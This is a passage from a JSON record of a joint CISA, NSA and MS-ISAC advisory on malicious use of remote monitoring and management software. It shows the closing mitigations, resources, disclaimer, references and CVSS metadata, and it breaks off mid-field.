Policies](<https://media.defense.gov/2019/Sep/09/2002180334/-1/-1/0/Enforce%20Signed%20Software%20Execution%20Policies%20-%20Copy.pdf>).\n * Application controls should prevent both installation and execution of portable versions of unauthorized RMM software.\n * Require authorized RMM solutions only be used from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).\n * Block both inbound and outbound connections on common RMM ports and protocols at the network perimeter. \n * Implement a user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.\n\n### **RESOURCES**\n\n * See CISA Insights [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>) for guidance on hardening MSP and customer infrastructure.\n * U.S. Defense Industrial Base (DIB) Sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center\u2019s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>).\n * CISA offers several Vulnerability Scanning to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>).\n * Consider participating in CISA\u2019s [Automated Indicator Sharing (AIS)](<https://www.cisa.gov/ais>) to receive real-time exchange of machine-readable cyber threat indicators and defensive measures. AIS is offered at no cost to participants as part of CISA\u2019s mission to work with our public and private sector partners to identify and help mitigate cyber threats through information sharing and provide technical assistance, upon request, that helps prevent, detect, and respond to incidents.\n\n### **PURPOSE**\n\nThis advisory was developed by CISA, NSA, and MS-ISAC in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **DISCLAIMER**\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA, NSA, and MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### References\n\n[[1] Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains. \u2014 Silent Push Threat Intelligence](<https://www.silentpush.com/blog/silent-push-uncovers-a-large-phishing-operation-featuring-amazon-geek-squad-mcafee-microsoft-norton-and-paypal-domains>)\n\n[[2] Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-277a>)\n\n[[3] Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-055a>)\n\n[[4] Karakurt Data Extortion Group | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-152a>)\n\n[[5] Compromise of U.S. Water Treatment Facility | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-042a>)\n\n[[6] North Korean Advanced Persistent Threat Focus: Kimsuky | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa20-301a>)\n\n[[7] Continued Threat Actor Exploitation Post Pulse Secure VPN Patching | CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa20-107a>)\n\n[[8] FBI Warns Public to Beware of Tech Support Scammers Targeting Financial Accounts Using Remote Desktop Software \u2014 FBI](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-public-to-beware-of-tech-support-scammers-targeting-financial-accounts-using-remote-desktop-software>)\n\n### Revisions\n\nJanuary 25, 2023: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2023-01-26T12:00:00", "type": "ics", "title": "Protecting Against Malicious Use of Remote Monitoring and Management Software", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPri